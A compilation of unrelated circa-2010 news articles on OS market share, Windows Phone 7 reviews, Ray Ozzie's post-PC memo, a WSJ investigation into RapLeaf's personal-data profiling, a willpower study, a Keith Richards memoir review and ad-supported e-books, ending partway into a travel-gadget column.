Microsoft has been at the top of the heap for almost as long as people have used PCs. They’ve managed to sustain an overwhelming competitive advantage, even after a decade’s worth of antitrust action and the astonishing transformation of Apple into a profit-making machine that has built one billion-dollar business after another while the entire rest of the tech industry is stuck in neutral. Indeed, the presence of Apple and Google as direct competitors suggests that maybe Microsoft is overdue to take a tumble.

There is never a shortage of Apple-versus-Microsoft yammering in the blogosphere, but I haven’t seen much in the way of actual data. Is Apple really making a dent in Microsoft’s long-standing Windows monopoly? Are mobile devices like the iPhone and iPad taking over tasks that used to be done by PCs? Sales figures tell part of the story, but in my opinion the best data comes from analyzing how devices are being used in the real world. I went off in search of hard numbers, and I found them at the same source I used earlier this year to measure Windows 7 adoption rates (see When will XP finally fade away?).

Net Market Share publishes snapshots of PC usage based on data from 160 million visits per month to its large collection of sites (the exact methodology is here). Its monthly reports on operating system versions contain a wealth of detailed information about even the most obscure OSes, and they’ve tracked the performance of mobile platforms consistently for the past three years. To compile the charts in this post, I went beyond the simple summary reports and dug deep into the details, recording and cross-tabulating data for desktop and mobile OSes from November 2007 until October 2010. I found four unmistakable trends.

Windows XP continues its steady decline. In early 2008, more than a year after Microsoft launched Windows Vista, Windows users had emphatically rejected that upgrade. Fewer than 10% of Windows users had switched, and nearly 5% of all Windows PCs in use were running Windows versions older than XP. The Windows 7 story is very, very different. One year after the release of Windows 7, it has made a significant dent in the Windows user base, and those diehards holding on to pre-XP versions have mostly surrendered. XP’s share of actual usage has declined more than 20 percent in two years, and that trend is accelerating.

There’s no evidence that the marketplace is abandoning Windows to any significant degree. The overall share of Internet traffic from Windows PCs has dropped slightly in the past two-and-a-half years, from 95.4% to 91.1%. But that’s true across the board for competing desktop OSes as well. Linux usage is down dramatically in 2010, to 0.85% from an all-time high of 1.08% in early 2009. Interestingly, OS X usage is also down, dropping by roughly a quarter of a percentage point since a year ago, from 5.26% to exactly 5.00%. In relative terms, that’s almost exactly the same overall drop as the Windows platform has seen in the same period.

Apple is still gaining on Microsoft, thanks to iOS-based devices. There’s no doubt that the Mac has been a big success for Apple over the past couple of years. While Microsoft was stumbling with Vista, Apple used a very aggressive advertising campaign that resulted in considerable growth of OS X usage, at least in relative terms. The Net Market Share stats confirm that OS X’s share of Internet usage rose from 3.45% in early 2008 to more than 5% last year. As I noted earlier, the Mac’s momentum has stalled (which might explain Apple’s sudden “Back to the Mac” event last week). But Apple’s overall share of the Internet continues to go up steadily, thanks to mobile devices like the iPhone and iPad. Added together, Apple’s one-two punch of OS X and iOS has been a clear winner. It will be interesting to look at these figures again in a year.

The mobile Internet is growing at an astonishing rate. This was the most fascinating set of numbers to me, and they’re also the ones that should have Microsoft most concerned. Back in 2007, Internet traffic from mobile devices was nearly nonexistent; today, mobile operating systems account for nearly 3% of all Internet traffic. The percentage of Internet usage on mobile devices has been doubling every eight months or so. If you extrapolate that trend, it’s easy to imagine a world in which mobile devices consume 20% or more of total Internet usage within the next two or three years.

So where is all that traffic coming from? Not surprisingly, Apple’s iOS-based devices are the leader in the mobile category, as measured by usage, accounting for 42% of the total traffic from mobile sources. The very close runner-up, at 37%, is a big surprise: Java Platform, Micro Edition (Java ME), presumably running mostly on Nokia feature phones. Symbian is a distant third at 11%, with Android in fourth at 8%.

We are indeed moving rapidly into a world where mobile devices are taking over many tasks that were previously handled by PCs. The big question is whether (and if so, when) that growth curve levels off. This is a market that is only beginning to explode, which means things can change very quickly. I’ll be looking closely at these monthly numbers over the next year, especially with Microsoft jumping into this space so aggressively with Windows Phone 7.

Early Windows Phone 7 Reviews Agree: Too Little, Too Late

Do smartphones running Windows Phone 7 OS stand a chance with consumers? Maybe, but apparently not with the critics
Daniel Ionescu

The first reviews of Microsoft's new Windows Phone 7 are in. Smartphones running the new OS will soon join the millions of iPhone and Android phones, but do they stand a chance? Reviewers are skeptical about the immediate success of Windows Phone 7 devices, as they are missing too many features, but still see a chance for Microsoft's shiny new user interface.

What's missing in Windows Phone 7 are features that were not included in some early version of the iPhone, or Android: copy and paste, multitasking, HTML5 support, universal search, and Adobe Flash support. Apple and Google, however, had a couple of years head start to work on these issues, most of which are now solved. So is Windows Phone 7 offering too little too late? Here's what the first reviews are saying.

PC World's Ginny Mies spent some time with Windows Phone 7 devices and thinks Microsoft has done "an excellent job" with the user interface, performance, and functionality. However, Mies notes, the absence of features like copy and paste, third-party multitasking, and Flash support "are big disappointments and set the OS behind both the Android and iPhone OSs."

The Wall Street Journal's Walt Mossberg is also not convinced about Windows Phone 7: "Overall, I can't recommend Windows Phone 7 as being on a par with iPhone or Android -- at least not yet." He notes in his review he "couldn't find a killer innovation that would be likely to make iPhone or Android users envious," and he sees "Windows Phone 7 as inferior to iPhone and Android for most average users. It's simply not fully baked yet."

Computerworld's Dan Rosenbaum thinks Microsoft did the right choice "in choosing between the simplicity and elegance of the iPhone and the power and deep configurability of Android. Microsoft has plainly (and perhaps surprisingly) opted for the former." He says the new OS is "genuinely innovative, but whether you should buy it on Day One depends largely on your appetite for new things."

Reviewing for Engadget, Joshua Topolsky writes that Windows Phone 7 "is a good year behind market leaders right now, and though it's clear the folks in Redmond are doing everything they can to get this platform up to snuff, it's also clear that they're not there yet." Despite this, "Microsoft has done an outstanding job with lots of aspects of this UI, particularly when it comes to navigation and ease of use -- but there are holes here as well," Topolsky notes.

Cnet's Bonnie Cha argues that "it's absolutely mind-boggling that Windows Phone 7 is missing some very fundamental features, like copy/paste, third-party multitasking, and universal search." She concludes that "Microsoft's long road to a comeback won't be an easy one, but at least it's now headed down the right path."

Gizmodo's Matt Buchanan is much more impressed, however: "Windows Phone 7 is really great. A solid foundation, it's elegant and joyful. True, a lot of that greatness is potential. But if anybody can follow through on their platform, it's Microsoft." But he avoids recommending it over an iPhone or Android device right now: "In six months, after the ecosystem has filled out, the answer will be more clear."

Departing Microsoft Visionary Ray Ozzie Sees "Post-PC" World
Bill Rigby

Microsoft Corp's resident visionary and departing software chief has urged the company to move on from its Windows and Office roots and imagine a "post-PC world" of simple, global Web devices.

Five years after Ray Ozzie made his mark with his "Internet Services Disruption" memo -- regarded as Microsoft's manifesto for Internet-based "cloud computing" -- he is again calling on the software giant to envision a future where simplicity is key.

Ozzie's emotional call to arms comes alongside what some analysts say is a watershed moment for the third largest company on the Standard & Poor's 500, which in November will see the first of a new generation of smartphones driven by its operating system hit store shelves, in a belated attempt to become a major player again in the booming wireless devices market.

"Let's mark this 5-year milestone by once again fearlessly embracing that which is technologically inevitable," Ozzie said in a personal blog post addressed to executive staff and direct reports.

"The next five years will bring about yet another inflection point -- a transformation that will once again yield unprecedented opportunities for our company and our industry catalyzed by the huge and inevitable shift in apps and infrastructure that's truly now just begun."

That world, Ozzie argues, will be one where users access always-available services through "devices that are fundamentally appliance-like by design, from birth. They're instantly usable, interchangeable and trivially replaceable without loss."

The call from Ozzie, who announced his retirement from Microsoft last week, is meant to galvanize the company, which has fallen behind Apple Inc and Google Inc in the rapidly growing phone and tablet computer sector and has been surprised by phenomenon such as social network Facebook.

"Close our eyes and form a realistic picture of what a post-PC world might actually look like, if it were to ever truly occur," wrote Ozzie in a memo posted on his personal blog on Monday. "Those who can envision a plausible future that's brighter than today will earn the opportunity to lead." (To read Ozzie's blog post, click here link.reuters.com/nam22q)

Disruption Again

Shortly after joining Microsoft, Ozzie wrote his now famous "Internet Services Disruption" memo in which he evangelized now-common cloud computing, where data and software are supplied over the Internet rather than installed on machines.

In Monday's blog, Ozzie said some of the goals he envisioned five years ago "remain elusive and are yet to be realized."

He goes on to praise competitors for "seamless fusion of hardware and software and services," which appears to be a nod to Apple's iPhone and Google's Android phone system and application marketplaces, which are proving more popular with consumers than Microsoft's own offerings.

"Their execution has surpassed our own in mobile experiences," said Ozzie.

Microsoft's new phone software will be available on handsets in the United States next month and a slew of Windows-powered tablet devices are expected next year.

Instead of a tech world founded on PCs and software -- which Microsoft's Windows operating system and Office suite of programs essentially created -- Ozzie urges Microsoft to think about "cloud-based continuous services that connect us all and do our bidding" and "appliance-like connected devices enabling us to interact with those cloud-based services."

Such devices could be at home, in the car, controlling elevators or highways, said Ozzie.

"Today's PC's, phones and pads are just the very beginning," said Ozzie. "We'll see decades to come of incredible innovation from which will emerge all sorts of 'connected companions' that we'll wear, we'll carry, we'll use on our desks and walls and the environment all around us."

If accurate, that represents a long-term threat to Microsoft, whose core Windows and Office units make up more than half of the company's $62 billion annual sales and 80 percent of its operating profit.

Ozzie, 54, is working on some of Microsoft's entertainment projects before retiring from the company in several months. He took over the role of Chief Software Architect from co-founder Bill Gates in 2006.

Gates started the tradition of the "call to action" internal memo, his most widely read being the "Internet Tidal Wave" memo in 1995, which urged the company to put the Web at the center of all its efforts.

Chief Executive Steve Ballmer said there are no plans to appoint a new chief software architect when Ozzie retires.

(Editing by Edwin Chan, Andre Grenon and Richard Chang)

A Web Pioneer Profiles Users by Name
Emily Steel

In the weeks before the New Hampshire primary last month, Linda Twombly of Nashua says she was peppered with online ads for Republican Senate hopeful Jim Bender.

It was no accident. An online tracking company called RapLeaf Inc. had correctly identified her as a conservative who is interested in Republican politics, has an interest in the Bible and contributes to political and environmental causes. Mrs. Twombly's profile is part of RapLeaf's rich trove of data, garnered from a variety of sources and which both political parties have tapped.

RapLeaf knows even more about Mrs. Twombly and millions of other Americans: their real names and email addresses.

This makes RapLeaf a rare breed. Rival tracking companies also gather minute detail on individual Americans: They know a tremendous amount about what you do. But most trackers either can't or won't keep the ultimate piece of personal information—your name—in their databases. The industry often cites this layer of anonymity as a reason online tracking shouldn't be considered intrusive.

RapLeaf says it never discloses people's names to clients for online advertising. But possessing real names means RapLeaf can build extraordinarily intimate databases on people by tapping voter-registration files, shopping histories, social-networking activities and real estate records, among other things.

"Holy smokes," says Mrs. Twombly, 67 years old, after The Wall Street Journal decoded the information in RapLeaf's file on her. "It is like a watchdog is watching me, and it is not good."

Some early adopters of the service are political campaigns. Democratic political consultant Chris Lehane used RapLeaf in a successful campaign against Proposition 17 in California, which would have changed the way auto-insurance rates are set in the state.

RapLeaf ranks among the most sophisticated players in the fast-growing business of profiling people online and trading in personal details of their lives, an industry that is the focus of a Journal investigation. The San Francisco startup says it has 1 billion e-mail addresses in its database.

RapLeaf acknowledges collecting names. It says it doesn't include Web-browsing behavior in its database, and it strips out names, email addresses and other personally identifiable data from profiles before selling them for online advertising.

Nevertheless, the Journal found that, in certain circumstances, RapLeaf had transmitted identifying details about Mrs. Twombly—such as a unique Facebook ID number, which can be linked back to a person's real name—to at least 12 companies. The Journal also found RapLeaf had transmitted a unique MySpace ID number (which is sometimes linked to a person's real name), to six companies. MySpace is owned by News Corp., which publishes the Journal.

RapLeaf says its transmission of Facebook and MySpace IDs was inadvertent and the practice was ended after the Journal brought it to the company's attention. The company says people can permanently opt out of its services at RapLeaf.com.

RapLeaf executives say their business offers valuable consumer benefits by allowing people to see relevant advertising and content. "The key goal of RapLeaf is to build a more personalizable world for people," says RapLeaf CEO Auren Hoffman. "We think a more personalizable world is a better world."

When a person logs in to certain sites, the sites send identifying information to RapLeaf, which looks up that person in its database of email addresses.

Then, RapLeaf installs a "cookie," a small text file, on the person's computer containing details about the individual (minus name and other identifiable facts). Sites where this happened include e-card provider Pingg.com, advice portal About.com and picture service TwitPic.com.

In some cases, RapLeaf also transmits data about the person to advertising companies it partners with.

Data gathered and sold by RapLeaf can be very specific. According to documents reviewed by the Journal, RapLeaf's segments recently included a person's household income range, age range, political leaning, and gender and age of children in the household, as well as interests in topics including religion, the Bible, gambling, tobacco, adult entertainment and "get rich quick" offers. In all, RapLeaf segmented people into more than 400 categories, the documents indicated.

RapLeaf's privacy policy states it won't "collect or work with sensitive data on children, health or medical conditions, sexual preferences, financial account information or religious beliefs."

After the Journal asked RapLeaf whether some of its profile segments contradicted its privacy policy, the company eliminated many of those segments. Segments eliminated include: interest in the Bible, Hispanic and Asian ethnic products, gambling, tobacco, adult entertainment, "get rich quick" offers and age and gender of children in household.

RapLeaf says many of its segments are also "used widely by the direct-marketing industry today."

In this year's hotly contested midterm elections, some political organizations are tapping RapLeaf's technology. With traditional postal mailing lists, "We used to bombard their house with mail. Now we can bombard their house with online ads," says Robert Willington, the Republican online campaign strategist who worked on behalf of Mr. Bender's New Hampshire campaign.

RapLeaf helped Mr. Bender's campaign target likely Republican voters with ads online. (Mr. Bender, who confirms working with RapLeaf, lost the election.)

In Mr. Lehane's California effort against Proposition 17 this year, RapLeaf found online about 200,000 suburban women over the age of 40 in Southern California, a demographic the campaign considered swing voters.

Mr. Lehane says the 4-percentage-point margin of defeat suggested the technology was effective. "With an election that close, every voter you can reach matters," he says.

Mr. Lehane says he was considering using RapLeaf as part of a campaign against Meg Whitman, who is running for governor in California. That campaign is being run by a political group, Level the Playing Field 2010, which was funded by several labor unions and which Mr. Lehane led.

RapLeaf says it has participated in about 10 campaigns this season, declining to identify them. "We expect that forward-thinking campaigns will begin to use it this year more widely as an alternative to direct mail, email and phone calls," says Joel Jewitt, RapLeaf's vice president of business development.

Co-founded in 2006 by Mr. Hoffman, a Silicon Valley entrepreneur, RapLeaf began as an online service letting people rate each other based on their business transactions.

The company raised an initial $1 million in funding from well-known Silicon Valley investors including PayPal co-founder and Facebook investor Peter Thiel. A person familiar with the situation says the company closed a $15 million fund-raising round this month.

Soon after it was founded, RapLeaf began "scraping"—or collecting information from—social networks to build a people search engine. It matched data from social-networking profiles with email addresses. RapLeaf says data it collects are public. It sold a service giving companies information about the customers on their e-mail lists.

By 2009, RapLeaf had indexed more than 600 million unique email addresses, it said in a press release that year, and was adding more at a rate of 35 million per month. Meanwhile, the business of helping marketers with their email lists (RapLeaf's core) was lagging in the recession. And the online-tracking business was taking off.

The Wall Street Journal analyzed the tracking files installed on people's computers by the 50 most popular websites, plus WSJ.com. Explore the data here and see separate analysis of the files on popular children's sites.

RapLeaf's Mr. Jewitt says the company saw an opportunity: It decided to connect its database of dossiers on people to cookies placed on those same individuals' computers, for ad targeting. "If you are a modern information company, you have to be involved in that," he says.

Combining off-line profiles with online tracking has raised red flags ever since another company first tried it 10 years ago. Privacy advocates argued that connecting people's Web-browsing habits with their names was too intrusive.

RapLeaf says it doesn't share or sell emails. However, under some circumstances it will provide names and other personal details if a client already possesses that person's email address.

For example, a company might come to RapLeaf with an email-address mailing list, and RapLeaf will try to provide information about the people on that list. This year, RapLeaf began offering services to target these people with online ads for the client.

For that to work, RapLeaf relies on a network of cooperating websites that use email addresses as part of the sign-on process. Those sites agree to transmit their users' email addresses (in encrypted form) to RapLeaf. Then, RapLeaf "drops," or installs, cookies on users' computers.

It's tough to build up a network of such sites, because many don't want to let outsiders track their visitors. This summer, RapLeaf sent a marketing email offering to pay one website an unspecified sum for this kind of access, according to documents reviewed by the Journal. The website chose not to take the offer.

RapLeaf declined to name the sites it works with, citing nondisclosure agreements. The Journal found that sites installing RapLeaf cookies included About.com, owned by the New York Times Co.; online invitation site Pingg.com; photo-sharing sites TwitPic.com and Plixi.com; movie site Flixster.com; discount site Tester-Rewards.com; and some Facebook.com and MySpace.com applications.

The Journal last week reported on the Facebook and MySpace apps sending data to RapLeaf. Both sites say they prohibit applications from sharing user data with outside data companies, and that they took steps to stop the apps that were transmitting user data to RapLeaf.

A Facebook spokesman says the company is acting to "dramatically limit" the exposure of users' personal information. Facebook says the user ID allows access only to information that Facebook requires people to make public in their profile.

MySpace says it uses RapLeaf data for its "friend recommendation" system, but doesn't share user data or let RapLeaf track MySpace users.

After receiving user IDs from some MySpace and Facebook apps, RapLeaf was then transmitting data about users to its advertising partners. After being contacted by the Journal, RapLeaf says it "acted immediately" to strip out identifying information from the data it shared with partners.

An About.com spokeswoman says the company doesn't have a relationship with RapLeaf. She says users' information was sent to RapLeaf via a partner that operates on its site, and that About.com wasn't aware its users' email addresses were being sent to RapLeaf.

Plixi.com says the company is "in experiment mode right now with behavioral-targeting companies like RapLeaf." Flixster.com says it "does not sell any of our users' personal information to anyone" and declined to comment further.

Pingg.com declined to comment. TwitPic and Tester-Rewards didn't respond to requests for comment.

The Journal decoded RapLeaf's information on Gordon McCormack Jr., a 52-year-old who lives in Ashland, N.H. RapLeaf correctly identified Mr. McCormack's income range, number of cars (one), his interests in gardening and the Beatles, and his interest in playing the online game Mafia Wars, among other topics.

Mr. McCormack says he plays Mafia Wars almost every day before going to bed.

RapLeaf also identified Mr. McCormack as someone with an interest in online personals. He says he isn't currently active in online dating, but might have a couple of profiles "lurking on the Internet."

When Mrs. Twombly, the New Hampshire Republican, registered at Pingg.com using her email address, RapLeaf matched her to dozens of "segments," according to a Journal analysis of the computer code transmitted while she was on the site.

The Journal was able to decode 26 of the segments, including her income range and age range and the fact that she is interested in the Bible and in cooking, crafts, rural farming and wildlife. Mrs. Twombly says all the decoded segments describe her accurately.

RapLeaf says some of the segments in Mrs. Twombly's and Mr. McCormack's profiles "do not exist," possibly due to changes in RapLeaf's overall segment list in the time since their web traffic was decoded for this article last month.

In Mrs. Twombly's case, RapLeaf transmitted data about her to at least 23 data and advertising companies after she logged into Pingg, according to the analysis of the computer code.

Twenty-two companies, including Google's Invite Media, confirmed receiving data from RapLeaf. RapLeaf declined to comment on its relationships with the companies.

Since talking with the Journal, Mrs. Twombly tweaked her Web browser to limit cookie installation. As a result, she says, some websites don't always work properly for her, a common side effect of restricting cookies.

Mrs. Twombly also removed applications from her Facebook profile that were transmitting data to RapLeaf, the Best Friends Gifts and Colorful Butterflies apps. The maker of those apps, Lolapps Media Inc., says it stopped working with RapLeaf.

Still, Mrs. Twombly is no longer using those apps to send virtual gifts and butterflies to her online friends. "My neighbor did send me a hug or a rainbow or a heart or something like that, but I didn't respond," Mrs. Twombly says. "Once burned, twice shy."
—Julia Angwin and Peter Wallsten contributed to this article.

Need a Study Break to Refresh? Maybe Not, Say Stanford Researchers

The Stanford researchers' study suggests that the need to take a break to clear your mind is all in your head.
Adam Gorlick

It could happen to students cramming for exams, people working long hours or just about anyone burning the candle at both ends: Something tells you to take a break. Watch some TV. Have a candy bar. Goof off, tune out for a bit and come back to the task at hand when you're feeling better. After all, you're physically exhausted.

But a new study from Stanford psychologists suggests the urge to refresh (or just procrastinate) is – well – all in your head.

In a paper published this week in Psychological Science, the researchers challenge a long-held theory that willpower – defined as the ability to resist temptation and stay focused on a demanding task – is a limited resource. Scientists have argued that when willpower is drained, the only way to restore it is by recharging our bodies with rest, food or some other physical distraction that takes you away from whatever is burning you out.

Not so, says the Stanford team. Instead, they've found that a person's mindset and personal beliefs about willpower determine how long and how well they'll be able to work on a tough mental exercise.

"If you think of willpower as something that's biologically limited, you're more likely to be tired when you perform a difficult task," said Veronika Job, the paper's lead author. "But if you think of willpower as something that is not easily depleted, you can go on and on."

Job, who conducted her research at Stanford and is now a postdoctoral scholar at the University of Zurich, co-authored the paper with Stanford psychology Professor Carol Dweck and Assistant Professor Greg Walton.

The researchers designed a series of four experiments to test and manipulate Stanford students' beliefs about willpower. After a tiring task, those who believed or were led to believe that willpower is a limited resource performed worse on standard concentration tests than those who thought of willpower as something they had more control over.

They also found that leading up to final exam week, students who bought into the limited resource theory ate junk food 24 percent more often than those who believed they had more control in resisting temptation. The limited resource believers also procrastinated 35 percent more than the other group.

"The theory that willpower is a limited resource is interesting, but it has had unintended consequences," Dweck said. "Students who may already have trouble studying are being told that their powers of concentration are limited and they need to take frequent breaks. But a belief in willpower as a non-limited resource makes people stronger in their ability to work through challenges."

The Stanford researchers say their findings could help people who are battling distraction or temptation: diabetics following strict diets, people trying to overcome addictions, employees facing a tight deadline.

"This is an example of a context where people's theories are driving outcomes," Walton said. "Willpower isn't driven by a biologically based process as much as we used to think. The belief in it is what influences your behavior."

A Writing Stone: Chapter And Verse The Life And Licks Of Keith Richards
Michiko Kakutani


By Keith Richards with James Fox

Illustrated. 564 pages. Little, Brown & Company. $29.99.

For legions of Rolling Stones fans, Keith Richards is not only the heart and soul of the world’s greatest rock ’n’ roll band, he’s also the very avatar of rebellion: the desperado, the buccaneer, the poète maudit, the soul survivor and main offender, the torn and frayed outlaw, and the coolest dude on the planet, named both No. 1 on the rock stars most-likely-to-die list and the one life form (besides the cockroach) capable of surviving nuclear war.

Halfway through his electrifying new memoir, “Life,” Keith Richards writes about the consequences of fame: the nearly complete loss of privacy and the weirdness of being mythologized by fans as a sort of folk-hero renegade.

“I can’t untie the threads of how much I played up to the part that was written for me,” he says. “I mean the skull ring and the broken tooth and the kohl. Is it half and half? I think in a way your persona, your image, as it used to be known, is like a ball and chain. People think I’m still a goddamn junkie. It’s 30 years since I gave up the dope! Image is like a long shadow. Even when the sun goes down, you can see it.”

By turns earnest and wicked, sweet and sarcastic and unsparing, Mr. Richards, now 66, writes with uncommon candor and immediacy. He’s decided that he’s going to tell it as he remembers it, and helped along with notebooks, letters and a diary he once kept, he remembers almost everything. He gives us an indelible, time-capsule feel for the madness that was life on the road with the Stones in the years before and after Altamont; harrowing accounts of his many close shaves and narrow escapes (from the police, prison time, drug hell); and a heap of sharp-edged snapshots of friends and colleagues — most notably, his longtime musical partner and sometime bête noire, Mick Jagger.

But “Life” — which was written with the veteran journalist James Fox — is way more than a revealing showbiz memoir. It is also a high-def, high-velocity portrait of the era when rock ’n’ roll came of age, a raw report from deep inside the counterculture maelstrom of how that music swept like a tsunami over Britain and the United States. It’s an eye-opening all-nighter in the studio with a master craftsman disclosing the alchemical secrets of his art. And it’s the intimate and moving story of one man’s long strange trip over the decades, told in dead-on, visceral prose without any of the pretense, caution or self-consciousness that usually attend great artists sitting for their self-portraits.

Die-hard Stones fans, of course, will pore over the detailed discussions of how songs like “Ruby Tuesday” and “Gimme Shelter” came to be written, the birthing process of some of Mr. Richards’s classic guitar riffs and the collaborative dynamic between him and Mr. Jagger. But the book will also dazzle the uninitiated, who thought they had only a casual interest in the Stones or who thought of Mr. Richards, vaguely, as a rock god who was mad, bad and dangerous to know. The book is that compelling and eloquently told.

Mr. Richards’s prose is like his guitar playing: intense, elemental, utterly distinctive and achingly, emotionally direct. Just as the Stones perfected a signature sound that could accommodate everything from ferocious Dionysian anthems to melancholy ballads about love and time and loss, so Mr. Richards has found a voice in these pages — a kind of rich, primal Keith-Speak — that enables him to dispense funny, streetwise observations, tender family reminiscences, casually profane yarns and wry literary allusions with both heart-felt sincerity and bad-boy charm.

Songwriting, Mr. Richards says, long ago turned him into an observer always on the lookout for “ammo,” and he does a highly tactile job here of conjuring the past, whether he’s describing his post-World War II childhood in the little town of Dartford (memorialized here with affectionate, Dickensian detail); the smoky blues clubs that he and his friends haunted in their early days in London; or the wretched excess of the Stones’ later tours, when they had “become a pirate nation,” booking entire floors in hotels and “moving on a huge scale under our own flag, with lawyers, clowns, attendants.”

In these pages we see Keith through the scrolling chapters of his life. There’s the choir boy and Boy Scout, who was bullied by schoolmates and kept a pet mouse named Gladys. The former art student, dedicating himself like a monk to mastering the blues:

“You were supposed to spend all your waking hours studying Jimmy Reed, Muddy Waters, Little Walter, Howlin’ Wolf, Robert Johnson. That was your gig. Every other moment taken away from it was a sin.”

And later, the rock star, known for his pirate swagger, who actually remains something of a shy romantic with women, worrying about finding “the right line, or one that hadn’t been used before.”

“I just never had that thing with women,” he writes. “I would do it silently. Very Charlie Chaplin. The scratch, the look, the body language. Get my drift? Now it’s up to you. ‘Hey, baby’ is just not my come-on.”

Mr. Richards communicates the boyish astonishment he felt when the Stones found their dream of being missionaries for the American music they loved suddenly giving way to pop fame of their own, and their hand-to-mouth existence in a London tenement (financed in part by redeeming empty beer bottles stolen from parties) metamorphosed into full-on stardom, complete with rioting teenagers and screaming girls. He conveys the exhausting rigors of life on the road, even as he captures the absurdities of what was rock star life back in the day: the pharmaceutical cocaine, the impulsive jaunts abroad (“let’s jump in the Bentley and go to Morocco”), the spectacle of the police perched in the trees outside his home.

Of the years of living dangerously, when he was zonked out on heroin, Mr. Richards recalls that he slept with a gun under his pillow; turned his 7-year-old son, Marlon, into his minder on the road; and forced all his band mates to live on “Keith Time,” in which 2 p.m. recording sessions had a way of becoming 1 a.m. dates the following day. He writes candidly about how everything began to revolve around “organizing the next fix” — elaborate stratagems, which at one point included buying doctor and nurse play sets at FAO Schwarz — and the difficulties of getting and staying clean.

Why did he become an addict in the first place? “I never particularly liked being that famous,” Mr. Richards says. “I could face people easier on the stuff, but I could do that with booze too. It isn’t really the whole answer. I also felt I was doing it not to be a ‘pop star.’ There was something I didn’t really like about that end of what I was doing, the blah blah blah. That was very difficult to handle, and I could handle it better on smack. Mick chose flattery, which is very like junk — a departure from reality. I chose junk.”

During the worst of his years on heroin, Mr. Richards writes, Mr. Jagger stepped up and dealt with the day-to-day business of running the band but was reluctant to relinquish his increased control once Mr. Richards returned to action. He writes that Mr. Jagger had begun to treat the rest of the band as “basically hirelings,” and he describes the sense of hurt and betrayal he felt when he read in an English newspaper that Mr. Jagger, then intent on a solo career, had described the Stones as a “millstone” around his neck.

Mr. Richards also mocks Mr. Jagger (whom he jokingly began referring to as “Brenda” or “Her Majesty”) as a social climber and swollen head, and says that Mr. Jagger “started second-guessing his own talent” and chasing after musical trends. But while this book’s passages about Mr. Jagger have made lots of headlines, especially in England, they are not all that different from the volleys of accusations the two have exchanged over the years, and Mr. Richards adds that deep down he and Mr. Jagger remain brothers.

It’s really less a case of “North and South Korea,” he says, than “East and West Berlin.”

Mr. Richards’s verbal photos of other colleagues and acquaintances are razor-sharp as well. He describes Hugh Hefner as “a nut” and “a pimp,” and Truman Capote as a “snooty” whiner. He writes that Chuck Berry was his “numero uno hero” (from whom Richards says he stole “every lick he ever played”) but “a big disappointment” when he met him in person. In another chapter he writes that success turned his former band mate Brian Jones “into this sort of freak, devouring celebs and fame and attention.”

In the course of “Life,” Mr. Richards discusses his clashes with the police and his much-chronicled court appearances, as well as all the other headlines generated by the tabloids over the years. But the most insistent melodic line in this volume has nothing to do with drugs or celebrity or scandal. It has to do with the spongelike love of music Mr. Richards inherited from his grandfather and his own sense of musical history, his reverence for the blues and R&B masters he has studied his entire life (“the tablets of stone”), and his determination to pass his own knowledge on down the line.

One of this galvanic book’s many achievements is that Mr. Richards has found a way to channel to the reader his own avidity, his own deep soul hunger for music and to make us feel the connections that bind one generation of musicians to another. Along the way he even manages to communicate something of that magic, electromagnetic experience of playing on stage with his mates, be it in a little club or a huge stadium.

“There’s a certain moment when you realize that you’ve actually just left the planet for a bit and that nobody can touch you,” Mr. Richards writes. “You’re elevated because you’re with a bunch of guys that want to do the same thing as you. And when it works, baby, you’ve got wings.” You are, he says, “flying without a license.”

Free E-Books, With a Catch – Advertising
John R. Quain

Barnes & Noble may kick off a fresh price war today for digital book readers. But the real news in digital publishing is a novel approach to the e-books themselves: Free books -- with advertising.

E-books and readers already look to be the holiday season's sleeper hit. Amazon announced that sales of its Kindle this month have already surpassed sales of the devices for the entire fourth quarter last year. And the company said that it will soon allow you to lend electronic versions of books for 14 days, a feature already offered on Barnes & Noble's Nook. (True friendship means always getting your loaned e-book back.)

Handheld electronic readers are clearly going mainstream. Wal-Mart just started selling Barnes & Noble's Nook this week, starting at $148. Best Buy sells both the Nook and the Kindle. Radio Shack offers Sony e-Readers, and Target recently starting selling Apple's iPad.

So it's not surprising that more independent online e-book stores and publishers are looking to get in on the action. Stores other than Amazon and Barnes & Noble do exist, after all, such as BooksOnBoard and the Diesel e-book store -- no connection to the jeans. Most of these independent operators offer e-books in a variety of formats that can be downloaded and read on anything from a smartphone to an e-book reader.

But only one independent seller is offering free books with ads: Wowio.

The basic idea is to offer publishers another way to reach readers and to give readers the chance to try more books -- books that perhaps they wouldn't normally peruse if they had to pay more for them. Initially, Wowio specialized in offering digital versions of comic books and graphic novels, usually formatted as Adobe PDFs. So it was a natural step for the company to offer graphic ads that are inserted in e-books.

The ads themselves aren't intrusive: There are no annoying highlighted links in the text, nor are there irritating animations or takeovers to interrupt the reading experience. The advertisements are simply pages added to a book, typically up front: Notices for movie site Fandango and auction site iTaggit appeared in the copy of H.G. Wells' The War of the Worlds that I read. It's much like the advertising you'd see in a magazine, except that if you want more information or are enticed by a promotion, all you have to do is click to visit the advertiser's site.

"We think we're creating a broader audience for some of these titles," Wowio's CEO Brian Altounian told me. "I think folks are going to download more books because they're saving the costs" of having to drive to the store or pay more for them.

So far, Wowio just sells titles in PDF format, but this week it announced a major step forward by signing a deal with massive distributor Ingram, which will give the online store access to more than 50,000 popular books on November 1. Ingram has many bestsellers, such as The Girl with the Dragon Tattoo by Stieg Larsson and Legacy by Danielle Steel.

Ingram titles will be in the ePub format, which gives the publisher some control over how many devices the books can be copied to; it's also the format supported by Barnes & Noble's Nook and Sony's e-Reader. However, these e-books will not include advertising, with prices for individual titles yet to be determined.

"We're not trying to force publishers into any sort of pricing paradigm," said Altounian, referring to Amazon's and Apple's contract tussles with publishers. Meanwhile, Amazon is also planning to offer a free iPad app for its books. So Wowio is keeping readers' and publishers' options open.

One the other hand, Wowio is clearly betting that ad-supported e-books will be the future. The company was just granted what the patent office calls a "notice of allowance" for delivering advertisements in e-books. According to Altounian, the company expects to finally receive a very broad patent next month.

If he's right about how readers and publishers react to the format, the company could stand to make a lot of money from licensing the patent. And we could stand to save a lot of money on our future e-book purchases.

Just Sit Back and Immerse Yourself
Joe Sharkey

I GOT waylaid by an insistent inventor as I was hurrying through the crowd on my way to a panel discussion at the National Business Aviation Association convention here last week.

“You’ve got to try this; it’s amazing,” said Shahriar S. Afshar, the peppy chief executive of a company called Immerz, who had been hovering by a display table.

Hey, I’m usually up for amazing, so I let Mr. Afshar slide a small plastic contraption around my neck. It had two flat paddles that rested on my chest. He handed me some headphones and held out an iPod so I could watch a movie clip.

